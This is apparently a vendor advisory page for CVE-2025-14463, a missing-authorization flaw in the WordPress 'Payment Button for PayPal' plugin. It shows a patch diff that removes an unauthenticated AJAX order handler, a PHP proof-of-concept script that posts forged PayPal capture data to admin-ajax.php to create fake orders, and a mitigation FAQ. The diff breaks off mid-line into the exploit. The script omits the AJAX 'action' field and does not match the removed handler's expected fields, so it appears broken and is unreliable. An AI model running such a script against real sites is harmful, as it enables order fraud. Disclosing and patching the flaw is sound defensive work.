+    2022, 2023, 2024 themes seem to convert front-end JavaScript & to & automatically breaking the PayPal button
+    changed the following logic because of this issue: https://core.trac.wordpress.org/ticket/45387#comment:14
+    if(shipping.length !== 0 && !isNaN(shipping)){
+    */
     $button_code .= <<<EOT
     <script>
     jQuery(document).ready(function() {
@@ -135,6 +142,10 @@
         function initPayPalButton{$id}() {
             var description = {$description_queryselector};
             var amount = {$amount_queryselector};
+            var totalamount = 0;
+            var shipping = "{$esc_js($shipping)}";
+            var currency = "{$esc_js($currency)}";
+            var break_down_amount = {$esc_js($break_down_amount)};
             var checkoutvar = {};
             var custom = {$custom_queryselector};
             var variation = {$variation_queryselector};
@@ -171,10 +182,10 @@
             }
             paypal.Buttons({
                 style: {
-                    layout: '{$layout}',
-                    color: '{$color}',
-                    shape: '{$shape}',
-                    label: '{$label}'
+                    layout: '{$esc_js($layout)}',
+                    color: '{$esc_js($color)}',
+                    shape: '{$esc_js($shape)}',
+                    label: '{$esc_js($label)}'
                 },
                 onInit: function (data, actions) {
                     actions.disable();
@@ -200,32 +211,94 @@
                 onClick: function () {
                     purchase_units[0].description = description.value;
                     purchase_units[0].amount.value = amount.value;
+                    if(break_down_amount){
+                        purchase_units[0].amount.breakdown = {};
+                        purchase_units[0].amount.breakdown.item_total = {};
+                        purchase_units[0].amount.breakdown.item_total.currency_code = currency;
+                        purchase_units[0].amount.breakdown.item_total.value = amount;
+                    }
+                    if(shipping.length !== 0){
+                        if(!isNaN(shipping)){
+                            purchase_units[0].amount.breakdown.shipping = {};
+                            purchase_units[0].amount.breakdown.shipping.currency_code = currency;
+                            purchase_units[0].amount.breakdown.shipping.value = shipping;
+                            totalamount = parseFloat(amount)+parseFloat(shipping);
+                        }
+                    }
+                    if(totalamount > 0){
+                        purchase_units[0].amount.value = String(totalamount);
+                    }
                 },

-                createOrder: function(data, actions) {
-                    return actions.order.create({
-                        purchase_units: purchase_units,
-                        $no_shipping
-                    });
+                createOrder: async function(data, actions) {
+                    var order_data = {
+                        intent: 'CAPTURE',
+                        payment_source: {
+                            paypal: {
+                                experience_context: {
+                                    payment_method_preference: 'IMMEDIATE_PAYMENT_REQUIRED',
+                                    shipping_preference: '{$esc_js($shipping_preference)}',
+                                }
+                            }
+                        },
+                        purchase_units: purchase_units,
+                    };
+                    let post_data = 'action=wppaypalcheckout_pp_api_create_order&data=' + encodeURIComponent(JSON.stringify(order_data));
+                    try {
+                        const response = await fetch('{$ajax_url}', {
+                            method: "post",
+                            headers: {
+                                    'Content-Type': 'application/x-www-form-urlencoded'
+                            },
+                            body: post_data
+                        });
+
+                        const response_data = await response.json();
+
+                        if (response_data.order_id) {
+                            console.log('Create-order API call to PayPal completed successfully');
+                            return response_data.order_id;
+                        } else {
+                            const error_message = response_data.err_msg
+                            console.error('Error occurred during create-order call to PayPal: ' + error_message);
+                            throw new Error(error_message); //This will trigger an alert in the catch block below
+                        }
+                    } catch (error) {
+                        console.error(error.message);
+                        alert('Could not initiate PayPal Checkout - ' + error.message);
+                    }
                 },

-                onApprove: function(data, actions) {
-                    return actions.order.capture().then(function(details) {
-                        var data = {
-                            'action': "wppaypalcheckout_ajax_process_order",
-                            'wppaypalcheckout_ajax_process_order': "1",
-                            'checkoutvar': checkoutvar,
-                            'details': details
-                        };
-                        jQuery.ajax({
-                            url : "{$ajax_url}",
-                            type : "POST",
-                            data : data,
-                            success: function(response) {
-                                $return_output
-                            }
+                onApprove: async function(data, actions) {
+                    console.log('Sending AJAX request for capture-order call');
+                    let pp_bn_data = {};
+                    pp_bn_data.order_id = data.orderID;
+                    pp_bn_data.checkoutvar = checkoutvar;
+
+                    let post_data = 'action=wppaypalcheckout_pp_api_capture_order&data=' + encodeURIComponent(JSON.stringify(pp_bn_data));
+                    try {
+                        const response = await fetch('{$ajax_url}', {
+                            method: "post",
+                            headers: {
+                                'Content-Type': 'application/x-www-form-urlencoded'
+                            },
+                            body: post_data
                         });
-                    });
+
+                        const response_data = await response.json();
+                        if (response_data.success) {
+                            console.log('Capture-order API call to PayPal completed successfully');
+                            $return_output
+                        } else {
+                            const error_message = response_data.err_msg
+                            console.error('Error: ' + error_message);
+                            throw new Error(error_message); //This will trigger an alert in the catch block below
+                        }
+
+                    } catch (error) {
+                        console.error(error);
+                        alert('Order could not be captured. Error: ' + JSON.stringify(error));
+                    }
                 },

                 onError: function (err) {
@@ -246,24 +319,6 @@
     return $button_code;
 }

-function wp_paypal_checkout_ajax_process_order(){
-    wp_paypal_debug_log('Received a response from frontend', true);
-    if(!isset($_POST['wppaypalcheckout_ajax_process_order'])){
-        wp_die();
-    }
-    wp_paypal_debug_log('Checkout - Received a notification from PayPal', true);
-    $post_data = $_POST;
-    array_walk_recursive($post_data, function(&$v) { $v = sanitize_text_field($v); });
-    wp_paypal_debug_log_array($post_data, true);
-    if(!isset($post_data['details'])){
-        wp_paypal_debug_log("Checkout - No transaction details. This payment cannot be processed.", false);
-        wp_die();
-    }
-    //
-    do_action('wp_paypal_checkout_process_order', $post_data);
-    wp_die();
-}
-
 function wp_paypal_checkout_get_option(){
     $options = get_option('wp_paypal_checkout_options');
     if(!is_array($options)){
@@ -288,7 +343,11 @@

 function wp_paypal_checkout_get_empty_options_array(){
     $options = array();
+    $options['test_mode'] = '';
+    $options['app_sandbox_client_id'] = '';
+    $options['app_sandbox_secret_key'] = '';
     $options['app_client_id'] = '';
+    $options['app_secret_key'] = '';
     $options['currency_code'] = '';
     $options['return_url'] = '';
     $options['cancel_url'] = '';
@@ -300,291 +359,24 @@
 function is_wp_paypal_checkout_configured(){
     $options = wp_paypal_checkout_get_option();
     $configured = true;
-    if(!isset($options['app_client_id']) || empty($options['app_client_id'])){
-        $configured = false;
-    }
-    if(!isset($options['currency_code']) || empty($options['currency_code'])){
-        $configured = false;
-    }
-    return $configured;
-}
-
-function wp_paypal_checkout_process_order_handler($post_data)
-{
-    $details = $post_data['details'];
-    if(!isset($details['payer'])){
-        wp_paypal_debug_log("Checkout - No payer data. This payment cannot be processed.", false);
-        return;
-    }
-    $payer = $details['payer'];
-    if(!isset($details['purchase_units'][0])){
-        wp_paypal_debug_log("Checkout - No purchase unit data. This payment cannot be processed.", false);
-        return;
-    }
-    $purchase_units = $details['purchase_units'][0];
-    if(!isset($purchase_units['payments']['captures'][0])){
-        wp_paypal_debug_log("Checkout - No payment capture data. This payment cannot be processed.", false);
-        return;
-    }
-    $capture = $purchase_units['payments']['captures'][0];
-    $payment_status = '';
-    if (isset($capture['status'])) {
-        $payment_status = sanitize_text_field($capture['status']);
-        wp_paypal_debug_log("Checkout - Payment Status - " . $payment_status, true);
-    }
-    if (isset($capture['status']['status_details']['reason'])) {
-        $status_reason = sanitize_text_field($capture['status']['status_details']['reason']);
-        wp_paypal_debug_log("Checkout - Reason - " . $status_reason, true);
-    }
-    $payment_data = array();
-    $payment_data['txn_id'] = '';
-    if (isset($capture['id'])) {
-        $payment_data['txn_id'] = sanitize_text_field($capture['id']);
-    } else {
-        wp_paypal_debug_log("Checkout - No transaction ID. This payment cannot be processed.", false);
-        return;
-    }
-    $args = array(
-        'post_type' => 'wp_paypal_order',
-        'meta_query' => array(
-            array(
-                'key' => '_txn_id',
-                'value' => $payment_data['txn_id'],
-                'compare' => '=',
-            ),
-        ),
-    );
-    $query = new WP_Query($args);
-    if ($query->have_posts()) {  //a record already exists
-        wp_paypal_debug_log("An order with this transaction ID already exists. This payment will not be processed.", false);
-        return;
-    }
-    $payer_name = '';
-    $payment_data['given_name'] = '';
-    $payment_data['first_name'] = '';
-    if (isset($payer['name']['given_name'])) {
-        $payment_data['given_name'] = sanitize_text_field($payer['name']['given_name']);
-        $given_name_parts = explode(" ", $payment_data['given_name']);
-        if(isset($given_name_parts[0]) && !empty($given_name_parts[0])){
-            $payment_data['first_name'] = sanitize_text_field($given_name_parts[0]);
-        }
-        $payer_name .= $payment_data['given_name'];
-    }
-    $payment_data['last_name'] = '';
-    if (isset($payer['name']['surname'])) {
-        $payment_data['last_name'] = sanitize_text_field($payer['name']['surname']);
-        $payer_name .= ' '.$payment_data['last_name'];
-    }
-    $payment_data['payer_email'] = '';
-    if (isset($payer['email_address'])) {
-        $payment_data['payer_email'] = sanitize_email($payer['email_address']);
-    }
-    $payment_data['item_names'] = '';
-    $payment_data['description'] = '';
-    if (isset($purchase_units['description'])) {
-        $payment_data['description'] = sanitize_text_field($purchase_units['description']);
-        $payment_data['item_names'] = $payment_data['description'];
-    }
-    $payment_data['mc_gross'] = '';
-    if (isset($purchase_units['amount']['value'])) {
-        $payment_data['mc_gross'] = sanitize_text_field($purchase_units['amount']['value']);
-    }
-    $payment_data['currency_code'] = '';
-    if (isset($purchase_units['amount']['currency_code'])) {
-        $payment_data['currency_code'] = sanitize_text_field($purchase_units['amount']['currency_code']);
-    }
-    $checkoutvar = $post_data['checkoutvar'];
-    $payment_data['custom'] = '';
-    if (isset($checkoutvar['custom']) && !empty($checkoutvar['custom'])) {
-        $payment_data['custom'] = sanitize_text_field($checkoutvar['custom']);
-    }
-    $payment_data['variation'] = '';
-    if (isset($checkoutvar['variation']) && !empty($checkoutvar['variation'])) {
-        $payment_data['variation'] = sanitize_text_field($checkoutvar['variation']);
-    }
-    $payment_data['shipping_name'] = '';
-    if (isset($purchase_units['shipping']['name'])) {
-        $payment_data['shipping_name'] = isset($purchase_units['shipping']['name']['full_name']) ? sanitize_text_field($purchase_units['shipping']['name']['full_name']) : '';
-    }
-    $ship_to = '';
-    $shipping_address = '';
-    if (isset($purchase_units['shipping']['address'])) {
-        $address_street = isset($purchase_units['shipping']['address']['address_line_1']) ? sanitize_text_field($purchase_units['shipping']['address']['address_line_1']) : '';
-        $ship_to .= !empty($address_street) ? $address_street.'<br />' : '';
-        $shipping_address .= !empty($address_street) ? $address_street.', ' : '';
-
-        $address_city = isset($purchase_units['shipping']['address']['admin_area_2']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_2']) : '';
-        $ship_to .= !empty($address_city) ? $address_city.', ' : '';
-        $shipping_address .= !empty($address_city) ? $address_city.', ' : '';
-
-        $address_state = isset($purchase_units['shipping']['address']['admin_area_1']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_1']) : '';
-        $ship_to .= !empty($address_state) ? $address_state.' ' : '';
-        $shipping_address .= !empty($address_state) ? $address_state.' ' : '';
-
-        $address_zip = isset($purchase_units['shipping']['address']['postal_code']) ? sanitize_text_field($purchase_units['shipping']['address']['postal_code']) : '';
-        $ship_to .= !empty($address_zip) ? $address_zip.'<br />' : '';
-        $shipping_address .= !empty($address_zip) ? $address_zip.', ' : '';
-
-        $address_country = isset($purchase_units['shipping']['address']['country_code']) ? sanitize_text_field($purchase_units['shipping']['address']['country_code']) : '';
-        $ship_to .= !empty($address_country) ? $address_country : '';
-        $shipping_address .= !empty($address_country) ? $address_country : '';
-    }
-    $payment_data['shipping_address'] = $shipping_address;
-    $wp_paypal_order = array(
-        'post_title' => 'order',
-        'post_type' => 'wp_paypal_order',
-        'post_content' => '',
-        'post_status' => 'publish',
-    );
-    wp_paypal_debug_log("Checkout - Inserting order information", true);
-    $post_id = wp_insert_post($wp_paypal_order, true);
-    if (is_wp_error($post_id)) {
-        wp_paypal_debug_log("Checkout - Error inserting order information: ".$post_id->get_error_message(), false);
-        return;
-    }
-    if (!$post_id) {
-        wp_paypal_debug_log("Checkout - Order information could not be inserted", false);
-        return;
-    }
-    $post_updated = false;
-    if ($post_id > 0) {
-        $post_content = '';
-        if(!empty($payment_data['description'])){
-            $post_content .= '<strong>Description:</strong> '.$payment_data['description'].'<br />';
-        }
-        if(isset($payment_data['custom']) && !empty($payment_data['custom'])){
-            $post_content .= '<strong>Custom:</strong> '.$payment_data['custom'].'<br />';
-        }
-        if(isset($payment_data['variation']) && !empty($payment_data['variation'])){
-            $post_content .= '<strong>Variation:</strong> '.$payment_data['variation'].'<br />';
-        }
-        if(!empty($payment_data['mc_gross'])){
-            $post_content .= '<strong>Amount:</strong> '.$payment_data['mc_gross'].'<br />';
-        }
-        if(!empty($payment_data['mc_currency'])){
-            $post_content .= '<strong>Currency:</strong> '.$payment_data['mc_currency'].'<br />';
-        }
-        if(!empty($payer_name)){
-            $post_content .= '<strong>Payer Name:</strong> '.$payer_name.'<br />';
+    if(isset($options['test_mode']) && !empty($options['test_mode'])){
+        if(!isset($options['app_sandbox_client_id']) || empty($options['app_sandbox_client_id'])){
+            $configured = false;
         }
-        if(!empty($payment_data['payer_email'])){
-            $post_content .= '<strong>Email:</strong> '.$payment_data['payer_email'].'<br />';
-        }
-        if(!empty($ship_to)){
-            $ship_to = '<h2>'.__('Ship To', 'wp-paypal').'</h2><br />'.$payment_data['shipping_name'].'<br />'.$ship_to.'<br />';
-        }
-        $post_content .= $ship_to;
-        $post_content .= '<h2>'.__('Payment Data', 'wp-paypal').'</h2><br />';
-        $post_content .= print_r($details, true);
-        $updated_post = array(
-            'ID' => $post_id,
-            'post_title' => $post_id,
-            'post_type' => 'wp_paypal_order',
-            'post_content' => $post_content
-        );
-        $updated_post_id = wp_update_post($updated_post, true);
-        if (is_wp_error($updated_post_id)) {
-            wp_paypal_debug_log("Checkout - Error updating order information: ".$updated_post_id->get_error_message(), false);
-            return;
-        }
-        if (!$updated_post_id) {
-            wp_paypal_debug_log("Checkout - Order information could not be updated", false);
-            return;
-        }
-        if ($updated_post_id > 0) {
-            $post_updated = true;
+        if(!isset($options['app_sandbox_secret_key']) || empty($options['app_sandbox_secret_key'])){
+            $configured = false;
         }
     }
-    //save order information
-    if ($post_updated) {
-        update_post_meta($post_id, '_txn_id', $payment_data['txn_id']);
-        update_post_meta($post_id, '_first_name', $payment_data['first_name']);
-        update_post_meta($post_id, '_last_name', $payment_data['last_name']);
-        update_post_meta($post_id, '_payer_email', $payment_data['payer_email']);
-        update_post_meta($post_id, '_mc_gross', $payment_data['mc_gross']);
-        update_post_meta($post_id, '_payment_status', $payment_status);
-        update_post_meta($post_id, '_custom', $payment_data['custom']);
-        update_post_meta($post_id, '_payment_data', $payment_data);
-        wp_paypal_debug_log("Checkout - Order information updated", true);
-
-        $email_options = wp_paypal_get_email_option();
-        add_filter('wp_mail_from', 'wp_paypal_set_email_from');
-        add_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
-        $purchase_email_body = '';
-        if(isset($email_options['purchase_email_enabled']) && !empty($email_options['purchase_email_enabled']) && !empty($payment_data['payer_email'])){
-            $subject = $email_options['purchase_email_subject'];
-            $subject = wp_paypal_do_email_tags($payment_data, $subject);
-            $type = $email_options['purchase_email_type'];
-            $body = $email_options['purchase_email_body'];
-            $body = wp_paypal_do_email_tags($payment_data, $body);
-            if($type == "html"){
-                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
-            }
-            //
-            if(isset($body) && !empty($body)){
-                $purchase_email_body = $body;
-            }
-            //
-            wp_paypal_debug_log("Sending a purchase receipt email to ".$payment_data['payer_email'], true);
-            $mail_sent = wp_mail($payment_data['payer_email'], $subject, $body);
-            if($type == "html"){
-                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-            }
-            if($mail_sent == true){
-                wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
-            }
-            else{
-                wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
-            }
+    else{
+        if(!isset($options['app_client_id']) || empty($options['app_client_id'])){
+            $configured = false;
         }
-        if(isset($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_recipient'])){
-            $subject = $email_options['sale_notification_email_subject'];
-            $subject = wp_paypal_do_email_tags($payment_data, $subject);
-            $type = $email_options['sale_notification_email_type'];
-            $body = $email_options['sale_notification_email_body'];
-            $body = wp_paypal_do_email_tags($payment_data, $body);
-            if($type == "html"){
-                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
-            }
-            //
-            if(isset($email_options['sale_notification_email_append_purchase_email']) && !empty($email_options['sale_notification_email_append_purchase_email'])){
-                $appended_content = PHP_EOL.PHP_EOL.'---Purchase Receipt Email---'.PHP_EOL.PHP_EOL;
-                if($type == "html"){
-                    $appended_content = wpautop($appended_content);
-                }
-                $appended_content .= $purchase_email_body;
-                $body .= $appended_content;
-            }
-            //
-            $email_recipients = explode(",", $email_options['sale_notification_email_recipient']);
-            foreach($email_recipients as $email_recipient){
-                $to = sanitize_email($email_recipient);
-                if(is_email($to)){
-                    wp_paypal_debug_log("Checkout - Sending a sale notification email to ".$to, true);
-                    $mail_sent = wp_mail($to, $subject, $body);
-                    if($mail_sent == true){
-                        wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
-                    }
-                    else{
-                        wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
-                    }
-                }
-            }
-            if($type == "html"){
-                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
-            }
+        if(!isset($options['app_secret_key']) || empty($options['app_secret_key'])){
+            $configured = false;
         }
-        remove_filter('wp_mail_from', 'wp_paypal_set_email_from');
-        remove_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
-
-        $details['post_order_id'] = $post_id;
-        do_action('wp_paypal_checkout_order_processed', $payment_data, $details);
-    } else {
-        wp_paypal_debug_log("Checkout - Order information could not be updated", false);
-        return;
     }
-    wp_paypal_debug_log("Checkout - Payment processing completed", true, true);
-    return;
+    if(!isset($options['currency_code']) || empty($options['currency_code'])){
+        $configured = false;
+    }
+    return $configured;
 }
--- a/wp-paypal/wp-paypal.php
+++ b/wp-paypal/wp-paypal.php
@@ -1,7 +1,7 @@
 <?php
 /*
   Plugin Name: WP PayPal
-  Version: 1.2.3.41
+  Version: 1.2.3.42
   Plugin URI: https://wphowto.net/wordpress-paypal-plugin-732
   Author: naa986
   Author URI: https://wphowto.net/
@@ -16,7 +16,7 @@

 class WP_PAYPAL {

-    var $plugin_version = '1.2.3.41';
+    var $plugin_version = '1.2.3.42';
     var $db_version = '1.0.2';
     var $plugin_url;
     var $plugin_path;
@@ -47,6 +47,7 @@

     function plugin_includes() {
         include_once('wp-paypal-order.php');
+        include_once('wp-paypal-checkout-api.php');
         include_once('wp-paypal-checkout.php');
         include_once('paypal-ipn.php');
         if(is_admin()){
@@ -66,9 +67,6 @@
         add_filter('manage_wp_paypal_order_posts_columns', 'wp_paypal_order_columns');
         add_action('manage_wp_paypal_order_posts_custom_column', 'wp_paypal_custom_column', 10, 2);
         add_shortcode('wp_paypal', 'wp_paypal_button_handler');
-        add_action('wp_ajax_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');
-        add_action('wp_ajax_nopriv_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');
-        add_action('wp_paypal_checkout_process_order', 'wp_paypal_checkout_process_order_handler');
         add_shortcode('wp_paypal_checkout', 'wp_paypal_checkout_button_handler');
     }

@@ -81,15 +79,23 @@
     }

     function admin_notice() {
+        $message = '';
         if (WP_PAYPAL_DEBUG) {  //debug is enabled. Check to make sure log file is writable
             $log_file = WP_PAYPAL_DEBUG_LOG_PATH;
-            if(!file_exists($log_file)){
-                return;
+            if(file_exists($log_file) && !is_writeable($log_file)){
+                $message .= '<div class="updated"><p>' . __('WP PayPal Debug log file is not writable. Please check to make sure that it has the correct file permission (ideally 644). Otherwise the plugin will not be able to write to the log file. The log file can be found in the root directory of the plugin - ', 'wp-paypal') . '<code>' . WP_PAYPAL_URL . '</code></p></div>';
             }
-            if (!is_writeable($log_file)) {
-                echo '<div class="updated"><p>' . __('WP PayPal Debug log file is not writable. Please check to make sure that it has the correct file permission (ideally 644). Otherwise the plugin will not be able to write to the log file. The log file can be found in the root directory of the plugin - ', 'wp-paypal') . '<code>' . WP_PAYPAL_URL . '</code></p></div>';
+        }
+        $options = wp_paypal_checkout_get_option();
+        if(isset($options['app_client_id']) && !empty($options['app_client_id'])){
+            if(!isset($options['app_secret_key']) || empty($options['app_secret_key'])){
+                $message .= '<div class="error"><p>' . __('To use Checkout, WP PayPal plugin requires your Client ID and Secret Key in the settings. Once you have updated the settings, click a PayPal checkout button on your site to ensure everything is working.', 'wp-paypal').'</p></div>';
             }
         }
+        if(empty($message)){
+            return;
+        }
+        echo $message;
     }

     function activate_handler() {
@@ -158,8 +164,20 @@
         if(!is_wp_paypal_checkout_configured()){
             return;
         }
+        $client_id = '';
+        if(isset($options['app_client_id']) && !empty($options['app_client_id'])){
+            $client_id = $options['app_client_id'];
+        }
+        if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+            if(isset($options['app_sandbox_client_id']) && !empty($options['app_sand

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14463 - Payment Button for PayPal <= 1.2.3.41 - Missing Authorization to Unauthenticated Arbitrary Order Creation
<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Craft a JSON payload mimicking a PayPal order capture response.
// All fields are attacker-controlled.
$payload = array(
    'data' => json_encode(array(
        'order_id' => 'FAKE-PAYPAL-ORDER-ID-123',
        'checkoutvar' => array(
            'custom' => 'Attacker-controlled custom data',
            'variation' => 'fake_variation'
        ),
        'payer' => array(
            'email_address' => 'attacker@example.com', // Receipt sent here
            'name' => array(
                'given_name' => 'John',
                'surname' => 'Doe'
            )
        ),
        'purchase_units' => array(
            array(
                'description' => 'Fake Product Name',
                'amount' => array(
                    'value' => '0.01',
                    'currency_code' => 'USD'
                ),
                'payments' => array(
                    'captures' => array(
                        array(
                            'id' => 'FAKE-PAYPAL-TXN-ID-456', // Saved as _txn_id
                            'status' => 'COMPLETED'
                        )
                    )
                )
            )
        )
    ))
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

// Execute the request to trigger order creation
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response
if ($http_code == 200) {
    echo "Request sent. Check if a fake order was created in the WordPress admin (Posts -> WP PayPal Order).n";
    echo "Response: " . $response . "n";
    // A successful JSON response with 'success:true' indicates the plugin processed the request.
} else {
    echo "Request failed with HTTP code: " . $http_code . "n";
}

?>

Frequently Asked Questions

What is CVE-2025-14463?
Understanding the vulnerability
CVE-2025-14463 is a security vulnerability in the Payment Button for PayPal plugin for WordPress, affecting versions up to and including 1.2.3.41. It allows unauthenticated attackers to create arbitrary orders due to a missing authorization check on a public AJAX endpoint.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists because the plugin exposes an AJAX endpoint that processes checkout results without authentication. Attackers can send crafted POST requests to this endpoint, creating fake orders with any transaction details they choose.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Payment Button for PayPal plugin version 1.2.3.41 or earlier is affected. Site administrators should verify their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Version verification process
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and locate the Payment Button for PayPal plugin. If the version is 1.2.3.41 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Steps to mitigate the issue
The vulnerability can be fixed by updating the Payment Button for PayPal plugin to version 1.2.3.42 or later, where the issue has been patched. Regularly updating plugins is crucial for maintaining site security.
What does the severity rating mean?
Understanding the CVSS score
CVE-2025-14463 has a CVSS score of 5.3, which is considered medium severity. This indicates that while the vulnerability does not allow for complete site takeover, it can lead to significant issues such as unauthorized order creation and potential fraud.
What are the risks of not addressing this vulnerability?
Potential consequences of inaction
Failing to address this vulnerability can result in unauthorized orders being created in your site’s database, leading to data corruption, fraudulent transactions, and potential disruption of business operations.
How does the proof of concept demonstrate the issue?
Exploitation example
The proof of concept shows how an attacker can send a crafted POST request to the vulnerable AJAX endpoint, including malicious data that mimics a legitimate PayPal order. This illustrates the ease with which the vulnerability can be exploited.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Payment Button for PayPal plugin until you can apply the patch. Additionally, monitor your site’s order database for any suspicious activity.
Are there any other security measures I should take?
Enhancing overall security
In addition to updating vulnerable plugins, ensure you have security plugins installed, conduct regular security audits, and implement strong user authentication practices to further protect your WordPress site.
Where can I find more information about this vulnerability?
Resources for further reading
Detailed information about CVE-2025-14463 can be found in the official CVE database and security advisories related to the Payment Button for PayPal plugin. Regularly check these resources for updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations